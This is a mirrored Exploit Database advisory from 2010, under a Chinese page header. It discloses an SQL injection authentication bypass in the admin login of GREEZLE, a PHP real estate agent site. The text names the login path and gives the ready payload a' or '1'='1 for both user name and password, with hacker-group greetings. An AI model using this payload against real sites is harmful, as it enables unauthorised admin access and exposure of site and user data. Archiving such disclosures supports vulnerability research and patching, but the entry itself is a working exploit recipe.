GREEZLE – Global Real Estate Agent Site Auth SQL Injection

• Exploit Database
• 10 阅读

• 作者： L0rd CrusAd3r
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13783/

• Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
  Exploit Title: GREEZLE - Global Real Estate Agent Site Authentication ByPass
  Published: 2010-06-09
  Vendor url:http://www.ifstudio.org/greezla/
  Price:99$
  Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW
  members
  #############################################################################################################################################################################
  
  
  GREEZLE - Global Real Estate Agent Site Authentication ByPass
  
  Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
  
  #############################################################################################################################################################################
  
  Description:
  
  GREEZLE is an easy in use site which allows to sell online any real estate
  objects.
  Visitors are able to browse, search and view properties.
   It allows you to create agent accounts, who can also sell any real estate
  objects at a fee you charge.
  
  ###############################################################################################################################################################################
  
  Vulnerability:
  
  *Authentication Bypass found
  
  The Provided Script as Sqli Vulnerability in Admin Login page
  
  Example : http://[site]/en/login
  
  Use the string a' or '1'='1 for User name and Password to gain access
  
  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
   # 0day no more#
  -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  
  ################################################################################################################################################################################
  -- 
  With R3gards,
  L0rd CrusAd3r